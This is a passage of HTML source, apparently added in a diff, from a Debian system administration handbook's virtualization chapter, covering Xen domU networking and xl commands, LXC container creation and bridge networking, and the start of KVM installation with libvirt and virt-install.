+IP-Address(es)  :  dynamic
+RSA Fingerprint :  0a:6e:71:98:95:46:64:ec:80:37:63:18:73:04:dd:2b
+Root Password   :  adaX2jyRHNuWm8BDJS7PcEJ
+</code></pre><div
+            class="para">
+				We now have a virtual machine, but it is currently not running (and therefore only using space on the dom0's hard disk). Of course, we can create more images, possibly with different parameters.
+			</div><div
+            class="para">
+				Before turning these virtual machines on, we need to define how they'll be accessed. They can of course be considered as isolated machines, only accessed through their system console, but this rarely matches the usage pattern. Most of the time, a domU will be considered as a remote server, and accessed only through a network. However, it would be quite inconvenient to add a network card for each domU; which is why Xen allows creating virtual interfaces, that each domain can see and use in a standard way. Note that these cards, even though they're virtual, will only be useful once connected to a network, even a virtual one. Xen has several network models for that:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						The simplest model is the <span
+                    class="emphasis"><em>bridge</em></span> model; all the eth0 network cards (both in the dom0 and the domU systems) behave as if they were directly plugged into an Ethernet switch.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Then comes the <span
+                    class="emphasis"><em>routing</em></span> model, where the dom0 behaves as a router that stands between the domU systems and the (physical) external network.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Finally, in the <span
+                    class="emphasis"><em>NAT</em></span> model, the dom0 is again between the domU systems and the rest of the network, but the domU systems are not directly accessible from outside, and traffic goes through some network address translation on the dom0.
+					</div></li></ul></div><div
+            class="para">
+				These three networking nodes involve a number of interfaces with unusual names, such as <code
+              class="filename">vif*</code>, <code
+              class="filename">veth*</code>, <code
+              class="filename">peth*</code> and <code
+              class="filename">xenbr0</code>. The Xen hypervisor arranges them in whichever layout has been defined, under the control of the user-space tools. Since the NAT and routing models are only adapted to particular cases, we will only address the bridging model.
+			</div><div
+            class="para">
+				The standard configuration of the Xen packages does not change the system-wide network configuration. However, the <code
+              class="command">xend</code> daemon is configured to integrate virtual network interfaces into any pre-existing network bridge (with <code
+              class="filename">xenbr0</code> taking precedence if several such bridges exist). We must therefore set up a bridge in <code
+              class="filename">/etc/network/interfaces</code> (which requires installing the <span
+              class="pkg pkg">bridge-utils</span> package, which is why the <span
+              class="pkg pkg">xen-utils-4.4</span> package recommends it) to replace the existing eth0 entry:
+			</div><pre
+            class="programlisting">auto xenbr0
+iface xenbr0 inet dhcp
+    bridge_ports eth0
+    bridge_maxwait 0
+</pre><div
+            class="para">
+				After rebooting to make sure the bridge is automatically created, we can now start the domU with the Xen control tools, in particular the <code
+              class="command">xl</code> command. This command allows different manipulations on the domains, including listing them and, starting/stopping them.
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>xl list</code></strong>
+<code
+              class="computeroutput">Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   463     1     r-----      9.8
+# </code><strong
+              class="userinput"><code>xl create /etc/xen/testxen.cfg</code></strong>
+<code
+              class="computeroutput">Parsing config from /etc/xen/testxen.cfg
+# </code><strong
+              class="userinput"><code>xl list</code></strong>
+<code
+              class="computeroutput">Name                                        ID   Mem VCPUs      State   Time(s)
+Domain-0                                     0   366     1     r-----     11.4
+testxen                                      1   128     1     -b----      1.1</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Choice of toolstacks to manage Xen VM</strong></p></div></div></div><a
+              id="id-1.15.5.12.24.2"
+              class="indexterm"></a><a
+              id="id-1.15.5.12.24.3"
+              class="indexterm"></a><div
+              class="para">
+				In Debian 7 and older releases, <code
+                class="command">xm</code> was the reference command line tool to use to manage Xen virtual machines. It has now been replaced by <code
+                class="command">xl</code> which is mostly backwards compatible. But those are not the only available tools: <code
+                class="command">virsh</code> of libvirt and <code
+                class="command">xe</code> of XenServer's XAPI (commercial offering of Xen) are alternative tools.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Only one domU per image!</strong></p></div></div></div><div
+              class="para">
+				While it is of course possible to have several domU systems running in parallel, they will all need to use their own image, since each domU is made to believe it runs on its own hardware (apart from the small slice of the kernel that talks to the hypervisor). In particular, it isn't possible for two domU systems running simultaneously to share storage space. If the domU systems are not run at the same time, it is however quite possible to reuse a single swap partition, or the partition hosting the <code
+                class="filename">/home</code> filesystem.
+			</div></div><div
+            class="para">
+				Note that the <code
+              class="filename">testxen</code> domU uses real memory taken from the RAM that would otherwise be available to the dom0, not simulated memory. Care should therefore be taken, when building a server meant to host Xen instances, to provision the physical RAM accordingly.
+			</div><div
+            class="para">
+				Voilà! Our virtual machine is starting up. We can access it in one of two modes. The usual way is to connect to it “remotely” through the network, as we would connect to a real machine; this will usually require setting up either a DHCP server or some DNS configuration. The other way, which may be the only way if the network configuration was incorrect, is to use the <code
+              class="filename">hvc0</code> console, with the <code
+              class="command">xl console</code> command:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>xl console testxen</code></strong>
+<code
+              class="computeroutput">[...]
+
+Debian GNU/Linux 8 testxen hvc0
+
+testxen login: </code></pre><div
+            class="para">
+				One can then open a session, just like one would do if sitting at the virtual machine's keyboard. Detaching from this console is achieved through the <span
+              class="keycap"><strong>Control</strong></span>+<span
+              class="keycap"><strong>]</strong></span> key combination.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Getting the console straight away</strong></p></div></div></div><div
+              class="para">
+				Sometimes one wishes to start a domU system and get to its console straight away; this is why the <code
+                class="command">xl create</code> command takes a <code
+                class="literal">-c</code> switch. Starting a domU with this switch will display all the messages as the system boots.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> OpenXenManager</strong></p></div></div></div><div
+              class="para">
+				OpenXenManager (in the <span
+                class="pkg pkg">openxenmanager</span> package) is a graphical interface allowing remote management of Xen domains via Xen's API. It can thus control Xen domains remotely. It provides most of the features of the <code
+                class="command">xl</code> command.
+			</div></div><div
+            class="para">
+				Once the domU is up, it can be used just like any other server (since it is a GNU/Linux system after all). However, its virtual machine status allows some extra features. For instance, a domU can be temporarily paused then resumed, with the <code
+              class="command">xl pause</code> and <code
+              class="command">xl unpause</code> commands. Note that even though a paused domU does not use any processor power, its allocated memory is still in use. It may be interesting to consider the <code
+              class="command">xl save</code> and <code
+              class="command">xl restore</code> commands: saving a domU frees the resources that were previously used by this domU, including RAM. When restored (or unpaused, for that matter), a domU doesn't even notice anything beyond the passage of time. If a domU was running when the dom0 is shut down, the packaged scripts automatically save the domU, and restore it on the next boot. This will of course involve the standard inconvenience incurred when hibernating a laptop computer, for instance; in particular, if the domU is suspended for too long, network connections may expire. Note also that Xen is so far incompatible with a large part of ACPI power management, which precludes suspending the host (dom0) system.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> <code
+                        class="command">xl</code> options</strong></p></div></div></div><div
+              class="para">
+				Most of the <code
+                class="command">xl</code> subcommands expect one or more arguments, often a domU name. These arguments are well described in the <span
+                class="citerefentry"><span
+                  class="refentrytitle">xl</span>(1)</span> manual page.
+			</div></div><div
+            class="para">
+				Halting or rebooting a domU can be done either from within the domU (with the <code
+              class="command">shutdown</code> command) or from the dom0, with <code
+              class="command">xl shutdown</code> or <code
+              class="command">xl reboot</code>.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Advanced Xen</strong></p></div></div></div><div
+              class="para">
+				Xen has many more features than we can describe in these few paragraphs. In particular, the system is very dynamic, and many parameters for one domain (such as the amount of allocated memory, the visible hard drives, the behavior of the task scheduler, and so on) can be adjusted even when that domain is running. A domU can even be migrated across servers without being shut down, and without losing its network connections! For all these advanced aspects, the primary source of information is the official Xen documentation. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.xen.org/support/documentation.html">http://www.xen.org/support/documentation.html</a></div>
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.lxc"></a>12.2.2. LXC</h3></div></div></div><a
+            id="id-1.15.5.13.2"
+            class="indexterm"></a><div
+            class="para">
+				Even though it is used to build “virtual machines”, LXC is not, strictly speaking, a virtualization system, but a system to isolate groups of processes from each other even though they all run on the same host. It takes advantage of a set of recent evolutions in the Linux kernel, collectively known as <span
+              class="emphasis"><em>control groups</em></span>, by which different sets of processes called “groups” have different views of certain aspects of the overall system. Most notable among these aspects are the process identifiers, the network configuration, and the mount points. Such a group of isolated processes will not have any access to the other processes in the system, and its accesses to the filesystem can be restricted to a specific subset. It can also have its own network interface and routing table, and it may be configured to only see a subset of the available devices present on the system.
+			</div><div
+            class="para">
+				These features can be combined to isolate a whole process family starting from the <code
+              class="command">init</code> process, and the resulting set looks very much like a virtual machine. The official name for such a setup is a “container” (hence the LXC moniker: <span
+              class="emphasis"><em>LinuX Containers</em></span>), but a rather important difference with “real” virtual machines such as provided by Xen or KVM is that there's no second kernel; the container uses the very same kernel as the host system. This has both pros and cons: advantages include excellent performance due to the total lack of overhead, and the fact that the kernel has a global vision of all the processes running on the system, so the scheduling can be more efficient than it would be if two independent kernels were to schedule different task sets. Chief among the inconveniences is the impossibility to run a different kernel in a container (whether a different Linux version or a different operating system altogether).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> LXC isolation limits</strong></p></div></div></div><div
+              class="para">
+				LXC containers do not provide the level of isolation achieved by heavier emulators or virtualizers. In particular:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						since the kernel is shared among the host system and the containers, processes constrained to containers can still access the kernel messages, which can lead to information leaks if messages are emitted by a container;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						for similar reasons, if a container is compromised and a kernel vulnerability is exploited, the other containers may be affected too;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						on the filesystem, the kernel checks permissions according to the numerical identifiers for users and groups; these identifiers may designate different users and groups depending on the container, which should be kept in mind if writable parts of the filesystem are shared among containers.
+					</div></li></ul></div></div><div
+            class="para">
+				Since we are dealing with isolation and not plain virtualization, setting up LXC containers is more complex than just running debian-installer on a virtual machine. We will describe a few prerequisites, then go on to the network configuration; we will then be able to actually create the system to be run in the container.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.13.7"></a>12.2.2.1. Preliminary Steps</h4></div></div></div><div
+              class="para">
+					The <span
+                class="pkg pkg">lxc</span> package contains the tools required to run LXC, and must therefore be installed.
+				</div><div
+              class="para">
+					LXC also requires the <span
+                class="emphasis"><em>control groups</em></span> configuration system, which is a virtual filesystem to be mounted on <code
+                class="filename">/sys/fs/cgroup</code>. Since Debian 8 switched to systemd, which also relies on control groups, this is now done automatically at boot time without further configuration.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.lxc.network"></a>12.2.2.2. Network Configuration</h4></div></div></div><div
+              class="para">
+					The goal of installing LXC is to set up virtual machines; while we could of course keep them isolated from the network, and only communicate with them via the filesystem, most use cases involve giving at least minimal network access to the containers. In the typical case, each container will get a virtual network interface, connected to the real network through a bridge. This virtual interface can be plugged either directly onto the host's physical network interface (in which case the container is directly on the network), or onto another virtual interface defined on the host (and the host can then filter or route traffic). In both cases, the <span
+                class="pkg pkg">bridge-utils</span> package will be required.
+				</div><div
+              class="para">
+					The simple case is just a matter of editing <code
+                class="filename">/etc/network/interfaces</code>, moving the configuration for the physical interface (for instance <code
+                class="literal">eth0</code>) to a bridge interface (usually <code
+                class="literal">br0</code>), and configuring the link between them. For instance, if the network interface configuration file initially contains entries such as the following:
+				</div><pre
+              class="programlisting">auto eth0
+iface eth0 inet dhcp</pre><div
+              class="para">
+					They should be disabled and replaced with the following:
+				</div><pre
+              class="programlisting">#auto eth0
+#iface eth0 inet dhcp
+
+auto br0
+iface br0 inet dhcp
+  bridge-ports eth0</pre><div
+              class="para">
+					The effect of this configuration will be similar to what would be obtained if the containers were machines plugged into the same physical network as the host. The “bridge” configuration manages the transit of Ethernet frames between all the bridged interfaces, which includes the physical <code
+                class="literal">eth0</code> as well as the interfaces defined for the containers.
+				</div><div
+              class="para">
+					In cases where this configuration cannot be used (for instance if no public IP addresses can be assigned to the containers), a virtual <span
+                class="emphasis"><em>tap</em></span> interface will be created and connected to the bridge. The equivalent network topology then becomes that of a host with a second network card plugged into a separate switch, with the containers also plugged into that switch. The host must then act as a gateway for the containers if they are meant to communicate with the outside world.
+				</div><div
+              class="para">
+					In addition to <span
+                class="pkg pkg">bridge-utils</span>, this “rich” configuration requires the <span
+                class="pkg pkg">vde2</span> package; the <code
+                class="filename">/etc/network/interfaces</code> file then becomes:
+				</div><pre
+              class="programlisting"># Interface eth0 is unchanged
+auto eth0
+iface eth0 inet dhcp
+
+# Virtual interface 
+auto tap0
+iface tap0 inet manual
+  vde2-switch -t tap0
+
+# Bridge for containers
+auto br0
+iface br0 inet static
+  bridge-ports tap0
+  address 10.0.0.1
+  netmask 255.255.255.0
+</pre><div
+              class="para">
+					The network can then be set up either statically in the containers, or dynamically with DHCP server running on the host. Such a DHCP server will need to be configured to answer queries on the <code
+                class="literal">br0</code> interface.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.13.9"></a>12.2.2.3. Setting Up the System</h4></div></div></div><div
+              class="para">
+					Let us now set up the filesystem to be used by the container. Since this “virtual machine” will not run directly on the hardware, some tweaks are required when compared to a standard filesystem, especially as far as the kernel, devices and consoles are concerned. Fortunately, the <span
+                class="pkg pkg">lxc</span> includes scripts that mostly automate this configuration. For instance, the following commands (which require the <span
+                class="pkg pkg">debootstrap</span> and <span
+                class="pkg pkg">rsync</span> packages) will install a Debian container:
+				</div><pre
+              class="screen"><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>lxc-create -n testlxc -t debian
+</code></strong><code
+                class="computeroutput">debootstrap is /usr/sbin/debootstrap
+Checking cache download in /var/cache/lxc/debian/rootfs-jessie-amd64 ... 
+Downloading debian minimal ...
+I: Retrieving Release 
+I: Retrieving Release.gpg 
+[...]
+Download complete.
+Copying rootfs to /var/lib/lxc/testlxc/rootfs...
+[...]
+Root password is 'sSiKhMzI', please change !
+root@mirwiz:~# </code>
+</pre><div
+              class="para">
+					Note that the filesystem is initially created in <code
+                class="filename">/var/cache/lxc</code>, then moved to its destination directory. This allows creating identical containers much more quickly, since only copying is then required.
+				</div><div
+              class="para">
+					Note that the debian template creation script accepts an <code
+                class="option">--arch</code> option to specify the architecture of the system to be installed and a <code
+                class="option">--release</code> option if you want to install something else than the current stable release of Debian. You can also set the <code
+                class="literal">MIRROR</code> environment variable to point to a local Debian mirror.
+				</div><div
+              class="para">
+					The newly-created filesystem now contains a minimal Debian system, and by default the container has no network interface (besides the loopback one). Since this is not really wanted, we will edit the container's configuration file (<code
+                class="filename">/var/lib/lxc/testlxc/config</code>) and add a few <code
+                class="literal">lxc.network.*</code> entries:
+				</div><pre
+              class="programlisting">lxc.network.type = veth
+lxc.network.flags = up
+lxc.network.link = br0
+lxc.network.hwaddr = 4a:49:43:49:79:20
+</pre><div
+              class="para">
+					These entries mean, respectively, that a virtual interface will be created in the container; that it will automatically be brought up when said container is started; that it will automatically be connected to the <code
+                class="literal">br0</code> bridge on the host; and that its MAC address will be as specified. Should this last entry be missing or disabled, a random MAC address will be generated.
+				</div><div
+              class="para">
+					Another useful entry in that file is the setting of the hostname:
+				</div><pre
+              class="programlisting">lxc.utsname = testlxc
+</pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.13.10"></a>12.2.2.4. Starting the Container</h4></div></div></div><div
+              class="para">
+					Now that our virtual machine image is ready, let's start the container:
+				</div><pre
+              class="screen scale"
+              width="94"><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>lxc-start --daemon --name=testlxc
+</code></strong><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>lxc-console -n testlxc
+</code></strong><code
+                class="computeroutput">Debian GNU/Linux 8 testlxc tty1
+
+testlxc login: </code><strong
+                class="userinput"><code>root</code></strong><code
+                class="computeroutput">
+Password: 
+Linux testlxc 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+root@testlxc:~# </code><strong
+                class="userinput"><code>ps auxwf</code></strong>
+<code
+                class="computeroutput">USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
+root         1  0.0  0.2  28164  4432 ?        Ss   17:33   0:00 /sbin/init
+root        20  0.0  0.1  32960  3160 ?        Ss   17:33   0:00 /lib/systemd/systemd-journald
+root        82  0.0  0.3  55164  5456 ?        Ss   17:34   0:00 /usr/sbin/sshd -D
+root        87  0.0  0.1  12656  1924 tty2     Ss+  17:34   0:00 /sbin/agetty --noclear tty2 linux
+root        88  0.0  0.1  12656  1764 tty3     Ss+  17:34   0:00 /sbin/agetty --noclear tty3 linux
+root        89  0.0  0.1  12656  1908 tty4     Ss+  17:34   0:00 /sbin/agetty --noclear tty4 linux
+root        90  0.0  0.1  63300  2944 tty1     Ss   17:34   0:00 /bin/login --     
+root       117  0.0  0.2  21828  3668 tty1     S    17:35   0:00  \_ -bash
+root       268  0.0  0.1  19088  2572 tty1     R+   17:39   0:00      \_ ps auxfw
+root        91  0.0  0.1  14228  2356 console  Ss+  17:34   0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt102
+root       197  0.0  0.4  25384  7640 ?        Ss   17:38   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.e
+root       266  0.0  0.1  12656  1840 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty5 linux
+root       267  0.0  0.1  12656  1928 ?        Ss   17:39   0:00 /sbin/agetty --noclear tty6 linux
+root@testlxc:~# </code></pre><div
+              class="para">
+					We are now in the container; our access to the processes is restricted to only those started from the container itself, and our access to the filesystem is similarly restricted to the dedicated subset of the full filesystem (<code
+                class="filename">/var/lib/lxc/testlxc/rootfs</code>). We can exit the console with <span
+                class="keycap"><strong>Control</strong></span>+<span
+                class="keycap"><strong>a</strong></span> <span
+                class="keycap"><strong>q</strong></span>.
+				</div><div
+              class="para">
+					Note that we ran the container as a background process, thanks to the <code
+                class="option">--daemon</code> option of <code
+                class="command">lxc-start</code>. We can interrupt the container with a command such as <code
+                class="command">lxc-stop --name=testlxc</code>.
+				</div><div
+              class="para">
+					The <span
+                class="pkg pkg">lxc</span> package contains an initialization script that can automatically start one or several containers when the host boots (it relies on <code
+                class="command">lxc-autostart</code> which starts containers whose <code
+                class="literal">lxc.start.auto</code> option is set to 1). Finer-grained control of the startup order is possible with <code
+                class="literal">lxc.start.order</code> and <code
+                class="literal">lxc.group</code>: by default, the initialization script first starts containers which are part of the <code
+                class="literal">onboot</code> group and then the containers which are not part of any group. In both cases, the order within a group is defined by the <code
+                class="literal">lxc.start.order</code> option.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Mass virtualization</strong></p></div></div></div><div
+                class="para">
+					Since LXC is a very lightweight isolation system, it can be particularly adapted to massive hosting of virtual servers. The network configuration will probably be a bit more advanced than what we described above, but the “rich” configuration using <code
+                  class="literal">tap</code> and <code
+                  class="literal">veth</code> interfaces should be enough in many cases.
+				</div><div
+                class="para">
+					It may also make sense to share part of the filesystem, such as the <code
+                  class="filename">/usr</code> and <code
+                  class="filename">/lib</code> subtrees, so as to avoid duplicating the software that may need to be common to several containers. This will usually be achieved with <code
+                  class="literal">lxc.mount.entry</code> entries in the containers configuration file. An interesting side-effect is that the processes will then use less physical memory, since the kernel is able to detect that the programs are shared. The marginal cost of one extra container can then be reduced to the disk space dedicated to its specific data, and a few extra processes that the kernel must schedule and manage.
+				</div><div
+                class="para">
+					We haven't described all the available options, of course; more comprehensive information can be obtained from the <span
+                  class="citerefentry"><span
+                    class="refentrytitle">lxc</span>(7)</span> and <span
+                  class="citerefentry"><span
+                    class="refentrytitle">lxc.container.conf</span>(5)</span> manual pages and the ones they reference.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.15.5.14"></a>12.2.3. Virtualization with KVM</h3></div></div></div><a
+            id="id-1.15.5.14.2"
+            class="indexterm"></a><div
+            class="para">
+				KVM, which stands for <span
+              class="emphasis"><em>Kernel-based Virtual Machine</em></span>, is first and foremost a kernel module providing most of the infrastructure that can be used by a virtualizer, but it is not a virtualizer by itself. Actual control for the virtualization is handled by a QEMU-based application. Don't worry if this section mentions <code
+              class="command">qemu-*</code> commands: it is still about KVM.
+			</div><div
+            class="para">
+				Unlike other virtualization systems, KVM was merged into the Linux kernel right from the start. Its developers chose to take advantage of the processor instruction sets dedicated to virtualization (Intel-VT and AMD-V), which keeps KVM lightweight, elegant and not resource-hungry. The counterpart, of course, is that KVM doesn't work on any computer but only on those with appropriate processors. For x86-based computers, you can verify that you have such a processor by looking for “vmx” or “svm” in the CPU flags listed in <code
+              class="filename">/proc/cpuinfo</code>.
+			</div><div
+            class="para">
+				With Red Hat actively supporting its development, KVM has more or less become the reference for Linux virtualization.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.6"></a>12.2.3.1. Preliminary Steps</h4></div></div></div><a
+              id="id-1.15.5.14.6.2"
+              class="indexterm"></a><div
+              class="para">
+					Unlike such tools as VirtualBox, KVM itself doesn't include any user-interface for creating and managing virtual machines. The <span
+                class="pkg pkg">qemu-kvm</span> package only provides an executable able to start a virtual machine, as well as an initialization script that loads the appropriate kernel modules.
+				</div><a
+              id="id-1.15.5.14.6.4"
+              class="indexterm"></a><a
+              id="id-1.15.5.14.6.5"
+              class="indexterm"></a><div
+              class="para">
+					Fortunately, Red Hat also provides another set of tools to address that problem, by developing the <span
+                class="emphasis"><em>libvirt</em></span> library and the associated <span
+                class="emphasis"><em>virtual machine manager</em></span> tools. libvirt allows managing virtual machines in a uniform way, independently of the virtualization system involved behind the scenes (it currently supports QEMU, KVM, Xen, LXC, OpenVZ, VirtualBox, VMWare and UML). <code
+                class="command">virtual-manager</code> is a graphical interface that uses libvirt to create and manage virtual machines.
+				</div><a
+              id="id-1.15.5.14.6.7"
+              class="indexterm"></a><div
+              class="para">
+					We first install the required packages, with <code
+                class="command">apt-get install qemu-kvm libvirt-bin virtinst virt-manager virt-viewer</code>. <span
+                class="pkg pkg">libvirt-bin</span> provides the <code
+                class="command">libvirtd</code> daemon, which allows (potentially remote) management of the virtual machines running of the host, and starts the required VMs when the host boots. In addition, this package provides the <code
+                class="command">virsh</code> command-line tool, which allows controlling the <code
+                class="command">libvirtd</code>-managed machines.
+				</div><div
+              class="para">
+					The <span
+                class="pkg pkg">virtinst</span> package provides <code
+                class="command">virt-install</code>, which allows creating virtual machines from the command line. Finally, <span
+                class="pkg pkg">virt-viewer</span> allows accessing a VM's graphical console.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.7"></a>12.2.3.2. Network Configuration</h4></div></div></div><div
+              class="para">
+					Just as in Xen and LXC, the most frequent network configuration involves a bridge grouping the network interfaces of the virtual machines (see <a
+                class="xref"
+                href="sect.virtualization.html#sect.lxc.network">12.2.2.2 – „Network Configuration“</a>).
+				</div><div
+              class="para">
+					Alternatively, and in the default configuration provided by KVM, the virtual machine is assigned a private address (in the 192.168.122.0/24 range), and NAT is set up so that the VM can access the outside network.
+				</div><div
+              class="para">
+					The rest of this section assumes that the host has an <code
+                class="literal">eth0</code> physical interface and a <code
+                class="literal">br0</code> bridge, and that the former is connected to the latter.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.15.5.14.8"></a>12.2.3.3. Installation with <code
+                      class="command">virt-install</code></h4></div></div></div><a
+              id="id-1.15.5.14.8.2"
+              class="indexterm"></a><div
+              class="para">
+					Creating a virtual machine is very similar to installing a normal system, except that the virtual machine's characteristics are described in a seemingly endless command line.
+				</div><div
+              class="para">
+					Practically speaking, this means we will use the Debian installer, by booting the virtual machine on a virtual DVD-ROM drive that maps to a Debian DVD image stored on the host system. The VM will export its graphical console over the VNC protocol (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.remote-desktops">9.2.2 – „Using Remote Graphical Desktops“</a> for details), which will allow us to control the installation process.
+				</div><div
+              class="para">
+					We first need to tell libvirtd where to store the disk images, unless the default location (<code
+                class="filename">/var/lib/libvirt/images/</code>) is fine.
+				</div><pre
+              class="screen"><code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>mkdir /srv/kvm</code></strong>
+<code
+                class="computeroutput">root@mirwiz:~# </code><strong
+                class="userinput"><code>virsh pool-create-as srv-kvm dir --target /srv/kvm</code></strong>
+<code
+                class="computeroutput">Pool srv-kvm created
+
+root@mirwiz:~# </code></pre><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Add your user to the libvirt group</strong></p></div></div></div><div
+                class="para">
+					All samples in this section assume that you are running commands as root. Effectively, if you want to control a local libvirt daemon, you need either to be root or to be a member of the <code
+                  class="literal">libvirt</code> group (which is not the case by default). Thus if you want to avoid using root rights too often, you can add yoursel to the <code
+                  class="literal">libvirt</code> group and run the various commands under your user identity.
+				</div></div><div
+              class="para">
+					Let us now start the installation process for the virtual machine, and have a closer look at <code
+                class="command">virt-install</code>'s most important options. This command registers the virtual machine and its parameters in libvirtd, then starts it so that its installation can proceed.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>virt-install --connect qemu:///system  <span
+                    id="virtinst.connect"><img
+                      class="callout"
+                      src="Common_Content/images/1.png"
+                      alt="1" /></span>
+               --virt-type kvm           <span
+                    id="virtinst.type"><img
+                      class="callout"
+                      src="Common_Content/images/2.png"
+                      alt="2" /></span>
+               --name testkvm            <span
+                    id="virtinst.name"><img
+                      class="callout"
+                      src="Common_Content/images/3.png"
+                      alt="3" /></span>
+               --ram 1024                <span
+                    id="virtinst.ram"><img
+                      class="callout"
+                      src="Common_Content/images/4.png"
+                      alt="4" /></span>
+               --disk /srv/kvm/testkvm.qcow,format=qcow2,size=10 <span
+                    id="virtinst.disk"><img
+                      class="callout"
+                      src="Common_Content/images/5.png"
+                      alt="5" /></span>
+               --cdrom /srv/isos/debian-8.1.0-amd64-netinst.iso  <span
+                    id="virtinst.cdrom"><img
+                      class="callout"
+                      src="Common_Content/images/6.png"
+                      alt="6" /></span>
+               --network bridge=br0      <span
+                    id="virtinst.network"><img
+                      class="callout"
+                      src="Common_Content/images/7.png"
+                      alt="7" /></span>
+               --vnc                     <span
+                    id="virtinst.vnc"><img
+                      class="callout"
+                      src="Common_Content/images/8.png"
+                      alt="8" /></span>
+               --os-type linux           <span
+                    id="virtinst.os"><img
+                      class="callout"
+                      src="Common_Content/images/9.png"
+                      alt="9" /></span>
+               --os-variant debianwheezy
+</code></strong><code
+                class="computeroutput">
+Starting install...
+Allocating 'testkvm.qcow'             |  10 GB     00:00
+Creating domain...                    |    0 B     00:00
+Guest installation complete... restarting guest.
+</code></pre><div
+              class="calloutlist"><table
+                border="0"
+                summary="Callout list"><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.connect"><img
+                          class="callout"
+                          src="Common_Content/images/1.png"
+                          alt="1" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">--connect</code> option specifies the “hypervisor” to use. Its form is that of an URL containing a virtualization system (<code
+                        class="literal">xen://</code>, <code
+                        class="literal">qemu://</code>, <code
+                        class="literal">lxc://</code>, <code
+                        class="literal">openvz://</code>, <code
+                        class="literal">vbox://</code>, and so on) and the machine that should host the VM (this can be left empty in the case of the local host). In addition to that, and in the QEMU/KVM case, each user can manage virtual machines working with restricted permissions, and the URL path allows differentiating “system” machines (<code
+                        class="literal">/system</code>) from others (<code
+                        class="literal">/session</code>).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.type"><img
+                          class="callout"
+                          src="Common_Content/images/2.png"
+                          alt="2" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							Since KVM is managed the same way as QEMU, the <code
+                        class="literal">--virt-type kvm</code> allows specifying the use of KVM even though the URL looks like QEMU.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#virtinst.name"><img
+                          class="callout"
+                          src="Common_Content/images/3.png"
